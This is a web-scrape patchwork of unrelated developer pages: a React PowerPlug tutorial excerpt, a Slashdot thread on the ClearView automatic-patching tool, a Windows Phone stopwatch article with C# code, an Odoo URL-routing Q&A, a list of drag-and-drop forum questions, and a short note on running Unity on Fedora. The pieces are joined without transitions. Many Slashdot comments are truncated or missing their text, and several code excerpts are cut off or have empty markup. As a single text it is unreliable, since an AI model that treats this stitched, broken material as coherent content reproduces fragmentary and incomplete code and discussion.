The Form component takes things a step further by allowing you to track the state of multiple fields on a form with ease:

<Form initial={{ firstName: "", lastName: "" }}>
  {({ input, values }) => (
    <form
      onSubmit={e => {
        e.preventDefault();
        console.log("Form Submission Data:", values);
      }}
    >
      <input
        type="text"
        placeholder="Your First Name"
        {...input("firstName").bind}
      />
      <input
        type="text"
        placeholder="Your Last Name"
        {...input("lastName").bind}
      />
      <input type="submit" value="All Done!" />
    </form>
  )}
</Form>

Timers

React PowerPlug isn’t just for tracking state variables and user input, you can also use it to wire up components to update automatically.

Interval

Unlike the other components we’ve discussed, Interval doesn’t take an initial state value and instead takes delay (in milliseconds).

<Interval delay={1000}>
  {({ start, stop, toggle }) => (
    <div>
      Updates every second, last updated at:{" "}
      {new Date().toLocaleTimeString()}
      <br /><br />
      <div>
        <button onClick={() => stop()}>Stop</button>
        <button onClick={() => start()}>Start</button>
        {" or "}
        <button onClick={() => toggle()}>Toggle!</button>
      </div>
    </div>
  )}
</Interval>

Conclusion

React PowerPlug stands up to the claims that it makes it easy to rapid prototype apps in React. As the project is very much a work in progress right now, I’m super excited to see where the team ends up taking it!
I hope that you enjoyed this run down of React PowerPlug and if you are interested in seeing the code samples in action, you can head over to CodeSandbox.
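If you're curious what the render-prop pattern used by these components boils down to, here is a minimal non-React sketch of a Toggle-like state container (purely illustrative — `createToggle` is a hypothetical name, not part of React PowerPlug):

```javascript
// Minimal sketch of the state-container idea behind a render-prop
// component like Toggle, stripped of React for illustration.
function createToggle(initial) {
  let on = initial;
  return {
    get on() { return on; },        // read the current boolean state
    toggle() { on = !on; return on; } // flip it, like Toggle's toggle()
  };
}

const t = createToggle(false);
t.toggle(); // t.on is now true
```

A React render-prop component does the same thing, but re-renders its children function with the fresh state on every change.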
https://alligator.io/react/react-powerplug/
Fixing Bugs, But Bypassing the Source Code timothy posted more than 4 years ago | from the wrapping-puzzles-in-enigmas dept. . I sure wouldn't (5, Funny) Korbeau (913903) | more than 4 years ago | (#29918067) run this software before running ClearView on it first. Imagine what this could do if it had a bug in its code! Re:I sure wouldn't (-1, Troll) Anonymous Coward | more than 4 years ago | (#29918:I sure wouldn't (0) Anonymous Coward | more than 4 years ago | (#29918221) WTF dude. You need to quit crack. Re:I sure wouldn't (1) Sam36 (1065410) | more than 4 years ago | (#29919045) Re:I sure wouldn't (2, Funny) sconeu (64226) | more than 4 years ago | (#29918287) Error - Stack recursion. Head asploding! One might have the question... (0, Interesting) Anonymous Coward | more than 4 years ago | (#29918069) was it ever applied to itself? ... and did it gain conciousness? Re:One might have the question... (1) thhamm (764787) | more than 4 years ago | (#29918981) MS will probably kill it (0, Flamebait) vawarayer (1035638) | more than 4 years ago | (#29918083) Another interesting project that Microsoft will probably buy out and kill in the egg. Re:MS will probably kill it (5, Insightful) SnarfQuest (469614) | more than 4 years ago | (#29918169) If MS included this in Windows, you'd never get to see the login screen because the CPU would be so busy fixing bugs. Yeah, and if it did happen to work (1) transporter_ii (986545) | more than 4 years ago | (#29918319) It would totally wipe out Microsoft's current business model. I think they better wait until they sucker everyone into software rental agreements before this is unleashed on Windows. . Re:Yeah, and if it did happen to work (1) BitZtream (692029) | more than 4 years ago | (#29919733) And how would it do that? You think MS software has every feature for every situation that will ever exist? Its just the bugs that are the problem? 
Re:MS will probably kill it (1, Insightful) MobileTatsu-NJG (946591) | more than 4 years ago | (#29918429) If MS included this in Windows, you'd never get to see the login screen because the CPU would be so busy fixing bugs. Geez... imagine the sheer volume of .CONF files a Linux user would have to waft through just to get this to check a distro for bugs. Re:MS will probably kill it (0) Anonymous Coward | more than 4 years ago | (#29918747) By installing via a distro customized binary, likely none Re:MS will probably kill it (4, Informative) Xtifr (1323) | more than 4 years ago | (#29919005):MS will probably kill it (5, Funny) mewsenews (251487) | more than 4 years ago | (#29919129):MS will probably kill it (-1, Troll) Anonymous Coward | more than 4 years ago | (#29919139) Just about the funniest thing in the world is when somebody makes a fool of themselves by making a joke about something they clearly don't understand. FYI, I'm laughing at you, not with you. Re:MS will probably kill it (1) westlake (615356) | more than 4 years ago | (#29918923) (3, Insightful) Missing_dc (1074809) | more than 4 years ago | (#29919485) Me-thinks someone sounds jealous they did not think of it first. This really deserves (4, Funny) fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#29918091) How about (4, Insightful) raddan (519638) | more than 4 years ago | (#29918583) Re:How about (1) blueg3 (192743) | more than 4 years ago | (#29918765) The relevance here? Re:How about (4, Interesting) raddan (519638) | more than 4 years ago | (#29919137) Re:How about (3, Insightful) Migala77 (1179151) | more than 4 years ago | (#29919369):How about (0) A nonymous Coward (7548) | more than 4 years ago | (#29919145) The relevance here? Well, none to you. But to people who understand Goedel Escher and Bach, your arrogant ignorance is quite the giggle. Re:How about (1) fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#29918897) ...an immortal, invulnerable program... 
(4, Funny) John Hasler (414242) | more than 4 years ago | (#29918111)
Has anyone cracked "Hello World" yet?

Re:...an immortal, invulnerable program... (2, Funny) selven (1556643) | more than 4 years ago | (#29918265)
It's not immortal. You want:
while 1: print "Hello World"

Re:...an immortal, invulnerable program... (1) zapakh (1256518) | more than 4 years ago | (#29918423)
while 1:
    try:
        while 1: print "Hello World"
    except KeyboardInterrupt:
        pass

Re:...an immortal, invulnerable program... (1) gzipped_tar (1151931) | more than 4 years ago | (#29919739)

Re:...an immortal, invulnerable program... (1) ShakaUVM (157947) | more than 4 years ago | (#29918523)
Sorry, but I have prior art on a truly immortal and bug-free program:
10 PRINT "HELLO WORLD"
20 GOTO 10
Let me know who I should contact so MIT can send the royalty checks on my software patent to me.

Re:...an immortal, invulnerable program... (1) dgatwood (11270) | more than 4 years ago | (#29918669)
You forgot
0 REM Block Control-C
1 ONERR GOTO 10
5 REM Control-Reset reboots
6 POKE 1010,0

Re:...an immortal, invulnerable program... (2, Funny) flaming error (1041742) | more than 4 years ago | (#29918821)
These two posts contain the most robust code I've seen all day. But still, "A computer's attention span is no longer than it's power cord."

Re:...an immortal, invulnerable program... (2, Funny) brainboyz (114458) | more than 4 years ago | (#29919123)
import fusiononachip
reference: [xkcd.com]

It's interesting, but software should "expire".. (0) skgrey (1412883) | more than 4 years ago | (#29918113)
This doesn't support innovation and improvement, and that's the cornerstone of technology improvement.

Re:It's interesting, but software should "expire". (4, Funny) Anonymous Coward | more than 4 years ago | (#29918153)
This doesn't support innovation and improvement, and that's the cornerstone of technology improvement.
Please allow myself to introduce... myself.

Re:It's interesting, but software should "expire".
(1) skgrey (1412883) | more than 4 years ago | (#29918197) "This doesn't support innovation and improvement, and that's the cornerstone of technology evolution." I'm thinking the gist was there at least.. Re:It's interesting, but software should "expire". (0) Anonymous Coward | more than 4 years ago | (#29918543) Re:It's interesting, but software should "expire". (1) DeadDecoy (877617) | more than 4 years ago | (#29918641) Source doesn't run (1) camperdave (969942) | more than 4 years ago | (#29918117) Re:Source doesn't run (1) Grishnakh (216268) | more than 4 years ago | (#29918331) lot of technology far more advanced than ours) when it's a lot easier to just get a structural engineer to look at the blueprints. Re:Source doesn't run (1) lgw (121541) | more than 4 years ago | (#29918799) difficult problems. For example, you'll never find a compiler bug by just looking at the source code (or more commonly, find that you misunderstood some dark corner of the language spec). Easy bugs tend to be apparant from the source. Hard bugs tend to require careful inspection of the object. Hmm, I guess there's several ways to paint causation over that correlation. Misleading Slashdot summary, as usual (2, Informative) Anonymous Coward | more than 4 years ago | (#29918131) It checks a bunch of identical machines for a set of know bugs, then applies a bunch of predermined patches until one works. That's nice, but not what was promised. Re:Misleading Slashdot summary, as usual (1) geckipede (1261408) | more than 4 years ago | (#29918275) They say this is intended as a method for keeping crap old code going when the original vendors are gone. Odds are, this autopatcher is going to be dealing with stuff the like of which you'd expect to see on thedailywtf. Re:Misleading Slashdot summary, as usual (1, Informative) Meshach (578918) | more than 4 years ago | (#29918457) This is good in preventing an attack or code injection. 
But as far as bug fixing, nothing could be further from the truth. Some developer still needs to look at the assembly generated to identify the bad path taken, find that place in the code, figure out how the program got there, apply a fix, test the fix, then deploy the new application. If anything this is a QA tool for software to avoid attacks. A valuable tool for exposing bugs. But as far as actually improving software, I do not see it.

Re:Misleading Slashdot summary, as usual (1) lgw (121541) | more than 4 years ago | (#29918909)
Well, obviously a valuable tool for finding bugs is a valuable tool for improving software. But perhaps not by itself.

Re:Misleading Slashdot summary, as usual (0) Meshach (578918) | more than 4 years ago | (#29919121)
Well, obviously a valuable tool for finding bugs is a valuable tool for improving software. But perhaps not by itself.
You are right. This tool does help developers find bugs. I guess my beef is the claim of the headline that this software will fix bugs and bypass the source code. It does highlight and cut off potential vulnerabilities without accessing the source code. But it does not "fix" anything and may cut off legitimate uses of the software. It just gives you notice and a dirty work around until a real fix can be developed and deployed.

Re:Misleading Slashdot summary, as usual (1, Informative) Anonymous Coward | more than 4 years ago | (#29919363)
You should re-read the article, and specifically the following passage: "For seven of the attacking team's approaches, ClearView created patches that corrected the underlying errors. In all cases, it discarded corrections that had negative side effects. On average, ClearView came up with a successful patch within about five minutes of its first exposure to an attack." So it does indeed fix bugs, contrary to your claim.

Re:Misleading Slashdot summary, as usual (2, Insightful) lgw (121541) | more than 4 years ago | (#29919611)
But was it a source patch, or a binary patch?
A binary patch is at best a dirty work-around, because the bug will keep reappearing in subsequent releases of the software (perhaps even in needed patches for other issues).

Re:Misleading Slashdot summary, as usual (1, Informative) Anonymous Coward | more than 4 years ago | (#29919203)
Either you didn't read the article, or you have a massive reading comprehension problem. Clearview actually creates patches to fix problems that it identifies. Note the following passage from the article: "For seven of the attacking team's approaches, ClearView created patches that corrected the underlying errors. In all cases, it discarded corrections that had negative side effects. On average, ClearView came up with a successful patch within about five minutes of its first exposure to an attack."

2012 (0) Frosty Piss (770223) | more than 4 years ago | (#29918159)

Why would you need to access the source (1) geekoid (135745) | more than 4 years ago | (#29918175)
code. I would argue that would be the worst way to do it. Look at the hex, make changes. The concept is no different than inserting or replacing a JMP to get around software protection.

Re:Why would you need to access the source (1) Miandrital (1029138) | more than 4 years ago | (#29918281)...

Re:Why would you need to access the source (2, Interesting) stephanruby (542433) | more than 4 years ago | (#29918625)).

If humans did the same..! (4, Funny) Odinlake (1057938) | more than 4 years ago | (#29918185):If humans did the same..! (1) Xtravar (725372) | more than 4 years ago | (#29918529)
THIS IS UNNATURAL HERESY!!!! You've convinced me. We need to destroy this program and replace it with one that makes judgments based on feelings.

Who will police the police? (2, Interesting) ashanin (1367775) | more than 4 years ago | (#29918187)
DNA?
(1) ShadowXOmega (808299) | more than 4 years ago | (#29918199)
- self repairing
- self replicating
- survive large amounts of time with minor changes

clearview (3, Insightful) wizardforce (1005805) | more than 4 years ago | (#29918219)

(5, Funny) Anonymous Coward | more than 4 years ago | (#29918327)
So run two.

Re:clearview (0) Anonymous Coward | more than 4 years ago | (#29918503)
But you first have to buy two licenses.

Re:clearview (0) owlstead (636356) | more than 4 years ago | (#29918703)
Because Clearview was created by a bunch of people that know what they are doing. Because Clearview is likely to be a much smaller target than the monitored software packages. Because Clearview is not directly connected to the web. Because Clearview may not even be easily detectable.

Re:clearview (1) wizardforce (1005805) | more than 4 years ago | (#29919265)
That is no deterrent. Many programs are made by reasonably intelligent people who "know what they're doing"; software is complex, especially for something like this. Why? Antivirus programs serve a very similar function and yet they are under attack all the time. Neither are other programs that have exploitable flaws. You could say the same for other programs. It's naive to believe that Clearview is a magic bullet here; every program has flaws, and a flaw in this program could prove disastrous.

Re:clearview (3, Insightful) BitZtream (692029) | more than 4 years ago | (#29919769).

Did they use that tool to develop that tool? (5, Interesting) 140Mandak262Jamuna (970587) | more than 4 years ago | (#29918311)
I wonder if we should turn that software loose on itself and see what it finds.

Re:Did they use that tool to develop that tool? (5, Insightful) Wonko the Sane (25252) | more than 4 years ago | (#29918795)
Fiendish? What could possibly be more fair and objective than making him eat his own dogfood?

Re:Did they use that tool to develop that tool?
(2, Insightful) mattack2 (1165421) | more than 4 years ago | (#29918885)
"Fiendish" prof? If this is even a true story, it rates a "duhh!" Of course he should have run his analyzer on his own code..

Re:Did they use that tool to develop that tool? (4, Insightful) KillerBob (217953) | more than 4 years ago | (#29919079)
Either that or put in an author check that automatically spits out an A+ if it detects that the author of the code was himself....

Masters? (0) Anonymous Coward | more than 4 years ago | (#29918935)
This type of stuff, like your friend did, has been written since the 1960s. It doesn't really work, unless the input code is written by slackers or idiots. I'm fairly certain I've seen this type of code written in a few lines of perl. A programmer with skill will KNOW how to write maintainable, readable, reusable code and simply do it. In fact, when pressured to not follow best practices, I suspect he will call in sick a few days to "help" management come to their senses. If someone actually earned a masters from this, that graduate program should be laughed out of existence. OR, you are explaining it very well.

thesis grade? (2, Insightful) pigwiggle (882643) | more than 4 years ago | (#29919589)
Hmmm. Sounds like some CS urban legend. Never heard - not once - of a "thesis grade". Pass, no-pass, conditional pass. I didn't receive a grade myself. Just a diploma. Be great for those kind of folks that put GPAs on their CV, though.

Re:Did they use that tool to develop that tool? (1) goodmanj (234846) | more than 4 years ago | (#29919747)
Great story, but [Citation needed].

Obviously Linux developers aren't human ;-) (2, Interesting) Zero__Kelvin (151819) | more than 4 years ago | (#29918313)
This is absolutely correct, so long as one assumes that Windows systems are the only systems, and Linux developers aren't human.
Re:Obviously Linux developers aren't human ;-) (0) Anonymous Coward | more than 4 years ago | (#29918571)
This is absolutely correct, so long as one assumes that Windows systems are the only systems, and Linux developers aren't human.
If we assume Windows systems are the only ones, Linux doesn't enter into the equation, so Linux developers don't need to not be human for the assumption that Windows systems are the only ones. Did you get it?

Microsoft will never buy it (-1, Redundant) Zero__Kelvin (151819) | more than 4 years ago | (#29918349)
So Microsoft won't be using it then ...

Re:Microsoft will never buy it (1, Funny) Anonymous Coward | more than 4 years ago | (#29918677)
So Microsoft won't be using it then ...
More like... (user to IT): When I left last night, I had Word open in Windows on this PC... when I came back this morning, the document was open in GVim in Linux!

DMCA? (0, Offtopic) happyslayer (750738) | more than 4 years ago | (#29918373)....

Re:DMCA? (1) happyslayer (750738) | more than 4 years ago | (#29919327)...

Yeah right... (0) Anonymous Coward | more than 4 years ago | (#29918387)
"Keeping the system going at all costs does seem to have merit," adds David Pearce, a senior lecturer in computer science at Victoria University in Wellington, New Zealand.
At all costs? What sort of systems does he imagine this would be useful for? Flight control computers? Industrial robots? Nuclear reactor control systems? Radiation therapy machines? Or just systems where people's lives aren't potentially in jeopardy when "keeping the system going at all costs" results in the system going haywire? When certain systems have something go wrong and end up in an unanticipated state, the thing you want to do is reset them to a known state, not just keep them going in hopes the software can get things under control.
Fuck3r (-1, Offtopic) Anonymous Coward | more than 4 years ago | (#29918401)

No Silver Bullet (2, Insightful) gweihir (88907) | more than 4 years ago | (#29918487):

Re:No Silver Bullet (2, Informative) Yold (473518) | more than 4 years ago | (#29918559)
I'd also point out that, from an automata theory standpoint, "The task of software verification is not solvable by a computer" (MIT's own Sipser).

Re:No Silver Bullet (2) cameigons (1617181) | more than 4 years ago | (#29918867)

Re:No Silver Bullet (1) FlyingBishop (1293238) | more than 4 years ago | (#29918659)
Unless they've solved strong AI and plan to just sit in and have the AI write perfect software for them so they can rake in the licensing fees until someone else figures it out.

Sensationalism ruined it for me (4, Insightful) billcopc (196330) | more than 4 years ago | (#29918493)
"When a potentially harmful vulnerability is discovered in a piece of software, it takes nearly a month on average for human engineers to come up with a fix and to push the fix out to affected systems"
Yes. It takes us 5 seconds to an hour to actually come up with the fix; the remainder of the month is spent in bureaucratic hell - sitting in a trouble ticket queue, sitting in a verification queue, sitting in a QA manager's inbox, sitting with the communications team. ClearView, if it does what it says on the tin, only addresses the 5-second problem. Any "sane" dev shop would still run the resultant patch through the many cogs and loops of modern software management. You won't get your hole patched any quicker; you'll just have shifted the coders' attention away from your own app's bugs and onto ClearView's bugs. Net gain: less than zero. Theoretically and conceptually, it's an interesting tool (you know, like Intercal). It just doesn't really fit in the industry, IMHO.

Re:Sensationalism ruined it for me (1) starrsoft (745524) | more than 4 years ago | (#29919147)
You're missing the point.
This isn't aimed at developers; it's aimed at end users.

Good idea... (1) Thelasko (1196535) | more than 4 years ago | (#29918533)

Next step: CPUs that do this (0) Anonymous Coward | more than 4 years ago | (#29918561)
I want my CPU to say, "oh, these are the instructions you meant to execute..." (Granted, I'd bet there are optimizations present in CPUs that do this today, but they're not supposed to introduce changes in behavior.)

Uh oh... (1) Taur0 (1634625) | more than 4 years ago | (#29918653)

Re:Uh oh... (1) garompeta (1068578) | more than 4 years ago | (#29919279)

sensationalists? (4, Informative) cameigons (1617181) | more than 4 years ago | (#29918749)

This is complete junk (0) Anonymous Coward | more than 4 years ago | (#29919003)
This is completely useless for any real application and for any complicated bugs. I've dealt with this for many many years. It sounds good in theory, but it simply doesn't work in the real world.

Wondering if it can be gamed (1) shoor (33382) | more than 4 years ago | (#29919117)

Be skeptical (2, Interesting) Anonymous Coward | more than 4 years ago | (#29919227).

Ridiculous! (1) Ancient_Hacker (751168) | more than 4 years ago | (#29919237):

Re:Ridiculous! (1) DarkOx (621550) | more than 4 years ago | (#29919687)
inserted. Now this certainly may change the actual function of the application, but possibly not in a way the users will notice or care about!

oh, I've seen this before somewhere (1) roman_mir (125474) | more than 4 years ago | (#29919273)
From TFA: ... reminded me of another ingenious software application: ...
"The first matrix I designed was quite naturally perfect, it was a work of art, flawless, sublime. A triumph equaled only by its monumental failure."
So, the solution to any program failure is creation of Zion (the rest of the idea here is left to the imagination of the reader.)
Virus Scanner (1) allcoolnameswheretak (1102727) | more than 4 years ago | (#29919287)
Sounds just like the way your everyday virus scanner works.

Martin Rinard a prof? (1) McNihil (612243) | more than 4 years ago | (#29919317)
's_theorem [wikipedia.org] Can I get my star now? People, this is what we get when people grow up with Windows.

Well... (0) Anonymous Coward | more than 4 years ago | (#29919381)
Isn't this already done with the "Hello World" program? But seriously, all software depends on hardware; you would really amaze me if you had a contiguous area of current that kept on fixing itself.

No good. (0) Anonymous Coward | more than 4 years ago | (#29919627)
It rates far too high on the thisAlgorithmBecomingSkynet [xkcd.com] index.

Yea, cause this hasn't been tried before ... (1) BitZtream (692029) | more than 4 years ago | (#29919681)
system. 'find a potential patch'? I have that; it's the 'Check for updates' button. Yes, I realize that it's trying to detect runtime errors and correct those, but anyone with half a clue about CS knows multiple reasons why this simply doesn't work. The first and foremost reason being that it will take something intentional, classify it as a bug, and 'fix' it. In effect breaking it. The only way to fix this is to keep a big exception list that constantly needs updating ... which will also have bugs. Rinse, repeat for the rest of eternity.
Stop Watch using Windows Phone
From Nokia Developer Wiki

This article explains how to create a stop watch in Windows Phone. It extends the article: Implement Timer control in Windows Phone.

Article Metadata
Code Example Source file: Media:StopWatch.zip
Tested with Device(s): Windows Phone Emulator
Compatibility Platform(s): Windows Phone 7.5, 8
Keywords: DispatcherTimer, Stop watch
Created: girishpadia (13 Oct 2011)
Last edited: hamishwillee (02 Jul 2013)

Introduction

This code example creates a simple stop watch which you can start and stop using the buttons Start Clock and Stop respectively. The example uses DispatcherTimer to update the stopwatch every second and lists how long the timer ran (calculated from the current DateTime when the buttons are pressed).

Implementation

- Create a new "Silverlight" project using C# and name the project "StopWatch".
- Drag one textblock from the toolbox and name it txtClock.
- Drag two buttons and place them just below txtClock as shown in the application image below. Name the buttons btnStart and btnStop respectively.
- In the XAML file, add the event handlers for the newly created buttons by adding the attribute Click="btnStart_Click" in the btnStart tag and Click="btnStop_Click" in the btnStop tag. Alternatively, just double click both buttons in the layout view.
- Drag another textblock, name it lblTimer, and place it below the buttons.
- Copy and paste the following code into your application.
using System;
using Microsoft.Phone.Controls;
using System.Windows.Threading;

namespace StopWatch
{
    public partial class MainPage : PhoneApplicationPage
    {
        DateTime lastTime, startTime;

        // Constructor
        public MainPage()
        {
            InitializeComponent();
        }

        // Fires once per second; keeps the clock display current.
        void OnTimerTick(Object sender, EventArgs args)
        {
            txtClock.Text = DateTime.Now.ToString();
        }

        private void btnStart_Click(object sender, System.Windows.RoutedEventArgs e)
        {
            DispatcherTimer newTimer = new DispatcherTimer();
            newTimer.Interval = TimeSpan.FromSeconds(1);
            newTimer.Tick += OnTimerTick;
            newTimer.Start();
            lastTime = DateTime.Now;
            startTime = DateTime.Now;
            lblTimer.Text = "Start time : " + lastTime.ToString() + "\n";
        }

        private void btnStop_Click(object sender, System.Windows.RoutedEventArgs e)
        {
            DateTime endTime = DateTime.Now;
            TimeSpan span = endTime.Subtract(startTime);
            lblTimer.Text += "Seconds from beginning: " + span.TotalSeconds.ToString() + "\n";
            span = endTime.Subtract(lastTime);
            lblTimer.Text += "Seconds from last stop: " + span.TotalSeconds.ToString() + "\n\n";
            lastTime = DateTime.Now;
        }
    }
}

Tested On
The application is tested on Windows Phone Emulator.

Hamishwillee - I've subedited and updated this
I've subedited and updated this - adding links to the DispatcherTimer. One question: why this type of timer, and not one of the others?
hamishwillee 07:42, 27 April 2012 (EEST)

Mihasi - Metadata update needed
I've made some changes to the code, so the metadata should be updated. Not sure how to do this; new to Windows Phone and this wiki.
Mihasi 13:34, 8 July 2012 (EEST)

Hamishwillee - @Mihasi - thank you
Hi Mihasi. Welcome to the wiki. Your profile is not public so I can't find anything about you - are you community or Nokia internal? Thanks for the changes to the code - they look good. In terms of the metadata, the usage is documented in Template:ArticleMetaData.
In general, what we're trying to do with most of the metadata is indicate the likely "relevance" of the content so that down the track people can tell if it's likely still to be useful and accurate over time - so we show review timestamps for articles if they are still relevant after a year or so. We add update stamps if we make big changes (effectively we're "renewing" the creation date). We add devices and platforms that the article has been tested on as they come along. The upshot is that if someone sees an article with new SDKs, devices and stamps, they know it's relevant. If it has older ones, they know that it's not as "trustable". In this case you wouldn't update SDK or platform information, because that is still current. Hope that makes sense. Thanks again for this - every little bit helps.
regards, Hamish
hamishwillee 10:06, 10 July 2012 (EEST)
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.

URL and routing in Building Website

Hi, please can anyone give me a clear idea regarding URL and routing when building a website? I got really confused.

Hello Umashankar,
Below is some information about website routing in Odoo.

Example: website_sale/templates.xml, line 643:
<template id="cart" name="Shopping Cart">
So, this is the template id, and the page will be localhost/shop/cart. Now, when you redirect to this page it will trigger the method of that page: website_sale/controllers/main.py, line 295:
@http.route(['/shop/cart'], type='http', auth="public", website=True)
def cart(self, **post):
With http.route you can trigger the method of a particular page. Hope that this answer will help you. Please don't hesitate to ask any question regarding this. If you get the answer you need, then please accept the answer. Thank you.

Thanks for the reply Kazim Mirza, but I still have doubts about some concepts; you have given just the overview. Please refer to this page. Thanks in advance.

Kazim Mirza: I know the tuts, but you just wanted to know routing, so I have given you an idea about it. So what do you want to know?

I don't get the concept of adding the model name in the URL path; please give some idea, Kazim.
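On the follow-up question about putting a model name in the URL path: Odoo routes can declare converter segments such as <model("product.template"):product>, which turn a URL fragment (usually a record id) into a browsed record passed to the controller method. A rough pure-Python sketch of that idea follows — this is not the real Odoo dispatcher, and the data and function names are invented for illustration:

```python
# Conceptual sketch (not the real Odoo dispatcher) of how a route like
#   @http.route(['/shop/product/<model("product.template"):product>'])
# turns a URL segment into a record handed to the controller.
import re

# Stand-in "database": record id -> record values.
PRODUCTS = {5: {"id": 5, "name": "Blue Shirt"}}

def route_product(path: str):
    """Match /shop/product/<id> and 'browse' the record, converter-style."""
    m = re.fullmatch(r"/shop/product/(\d+)", path)
    if not m:
        return None          # path doesn't match this route
    return PRODUCTS.get(int(m.group(1)))

print(route_product("/shop/product/5"))   # {'id': 5, 'name': 'Blue Shirt'}
```

In real Odoo, the converter does the regex matching and the record browsing for you, so the controller method simply receives `product` as an argument.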
JQuery :: Get Video Path During Drag And Drop? Dec 23, 2010

I want to perform a drag and drop operation on a video file, in which I want to make a video carousel for all videos and drag a video to the main player and play it on the main player. View 2 Replies

My scenario is to drag an item from a repeater/datalist to another repeater (preview repeater). The preview repeater already contains some icons in some positions (for e.g. in 1st and 4th items). I need to insert the icon into the empty positions (2nd, 3rd and 5th items) in the preview repeater. View 4 Replies

I have two listboxes; how can I drag and drop between these two using jQuery? View 4 Replies

This function takes an li element and adds it to another ul element. After this code is fired, the jQuery events attached to the children spans of the li element do not fire the first time they are clicked. View 2 Replies

I want to make content switch: say there are 3 items.. Item 1, Item 2, Item 3 in a datalist, and if I drag Item 1 to Item 3 the content will interchange... "Item 3" will go to "Item 1" and "Item 1" to "Item 3". What code do I write in the drop function? Here is my code. Is this even possible?

Default.aspx
<link href="" rel="stylesheet" type="text/css"/>
<script src=""></script>
<script src=""></script>
[code]....

implementing a drag and drop feature into my website. I was wondering if anyone has any good examples on how this can be done? View 3 Replies

I need to develop an interface something like iGoogle, with drag and drop of boxes, in ASP.Net 2.0. The interface should support cross-browser compatibility. View 1 Replies

I would like to ask: we select a file on our system and drag that file into the browser, dropping it into a particular location of the browser; at that time the file is to upload. View 4 Replies

We have an asp.net treeview control and a textarea.
The childnodes of the treeview need to be draggable and can be dropped into the textarea. View 2 Replies

I need to change the cell positions of the gridview via drag and drop. View 1 Replies] ....

I have a linkbutton whose OnClick method does not fire after a jQuery drag and drop; the OnClientClick does work. Why would the server-side code not work only after a jQuery drag and drop? View 4 Replies

I wanna save the order of my list to the SQL Server database in jQuery drag & drop using asp.net c#. How can I do this? View 1 Replies

I have two gridviews. I load the same data into both gridviews; after that, I drag and drop an ID from one grid to another grid. If the IDs are the same it should show a "match" alert, or else a "not match" alert, using jQuery. View 1 Replies

When I drag and drop the gridview row record, then the update-preference button (update preference) will be enabled. Otherwise it will be disabled.. Please refer to this link: [URL] ....

I want to implement some drag and drop behaviors in my ASP.NET app. Could someone point me in the right direction for some articles and samples? For example, one example of drag and drop I want to implement is for sorting things. View 4 Replies

I currently have two listboxes and I use arrow buttons to move items from one list to another. Is there a way I could implement drag and dropping between those 2 listboxes? View 3 Replies

I've built a WPF application with two listBoxes. I managed to drag and drop elements from one listbox to the other, but it always gets added to the end/bottom of the second listbox. How can I drag and drop the element and place it in the other listbox where I want it to be, where the cursor is located/points, and not at the end (as the last element)? View 1 Replies

In WPF I have a textBox. I need to drag and drop text files, i.e. in Notepad, from the desktop to the textbox of WPF. I managed to get the contents of Notepad into the textbox. But I need the file path to be in the browser so that I can transfer files from client to client.
I need the file path instead. privatevoid textBox1_PreviewDragEnter(object sender, DragEventArgse) { bool isCorrect = true; if (e.Data.GetDataPresent(DataFormats.FileDrop, true) == true ) { string[] filenames = (string[])e.Data.GetData(DataFormats.FileDrop, true ); [Code] .... Anyone who can give me a tip on articles explaining how I can implement a drag n drop functionality between two asp controls? I'm using Asp.net 3.5.View 1 Replies I cannot get the Drag and Drop functionality of Web Parts is to work. I have a very simple test page with two WebPartZones.. In the OnInit method of the code behind I put the page in design mode. In the first zone I have a textbox.At runtime the text box renders as a web part. When I hover over the web part header my mouse pointer changes the 'move' pointer, but I cannot drag the item. I do not see it dragging and the part never moved. I am using Visual Studio 2010 with IE 8. I have tried IE8 in compatibility mode and regular mode. The results are the same. Here is the markup from my test page: <form id="form1" runat="server"> <div> <asp:WebPartManager </asp:WebPartManager> <asp:WebPartZone <ZoneTemplate> <asp:TextBox </ZoneTemplate> </asp:WebPartZone> aa <asp:WebPartZone </asp:WebPartZone> aa <asp:EditorZone </asp:EditorZone> </div> </form> Here is the code behind: protected override void OnInit(EventArgs e) { base.OnInit(e); WebPartManager mgr = WebPartManager.GetCurrentWebPartManager(this); mgr.DisplayMode = WebPartManager.DesignDisplayMode; } What am I missing? I have to generate an organization chart, in my asp.net application and it should supports drag and drop feature to update the linkage between organization structure. What would be the best way to deal with it, (jQuery or silver light or .net chart controls). My primary needs is to support drag and drop.View 4 Replies I have a listview showing images like ImageViewer and I want to implement Drag-Drop behavior within ListView. 
how can i achieve the Srag-Drop inside the below kind of customized ListView. <asp:ListView <LayoutTemplate> <table id="groupPlaceholderContainer" runat="server" border="1"> <tr id="groupPlaceholder" runat="server"> </tr> </table> </LayoutTemplate> <ItemTemplate> <td id="Td4" align="center" style="background-color: #eeeeee;"> <asp:Image <br /> <asp:Label </td> </ItemTemplate> <GroupTemplate> <tr id="itemPlaceholderContainer" runat="server"> <td id="itemPlaceholder" runat="server"> </td> </tr> </GroupTemplate> <InsertItemTemplate> <td id="Td3" width="150px" height="150px" runat="server" align="center" style="background-color: #e8e8e8; color: #333333;"> <asp:FileUpload </td> </InsertItemTemplate> </asp:ListView> Code Behind: public class ImageEntity { public string PhotoName { get; set; } public int PhotoIndex { get; set; } public string PhotoURL { get; set; } } public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { IList<ImageEntity> imagesList = new List<ImageEntity>() { new ImageEntity(){ PhotoName="House1", PhotoIndex=1, PhotoURL= @"ImagesHouse-01.JPG" }, new ImageEntity(){ PhotoName="House2", PhotoIndex=2, PhotoURL= @"ImagesHouse-05.JPG" }, new ImageEntity(){ PhotoName="House3", PhotoIndex=3, PhotoURL= @"Imageshouse.jpg" }, new ImageEntity(){ PhotoName="House4", PhotoIndex=4, PhotoURL= @"Imageshouse2.jpg" } }; lvPhotoViewer.DataSource = imagesList; lvPhotoViewer.DataBind(); } }
As you recall from the previous blog post, I'd installed Unity and JetBrains Rider on my Fedora 32 computer via Flatpaks. I was going to use them for the Unity Multiplayer course I was taking on Udemy. Unfortunately it was an immediate fail: in lesson one, after they have me install a new inputs library and restart Unity, it would always crash upon loading the file. I'm currently installing Unity 2020.1 on my Windows computer, where I don't expect to have that issue. Assuming I don't, then it's a big fat nope on using Unity on Fedora via Flatpak (at least for this class). Which, to be fair, is not on their supported OS list – which is only Ubuntu and CentOS 7. (And the latter for movie-making.)

Unity and JetBrains Rider on Fedora via Flathub

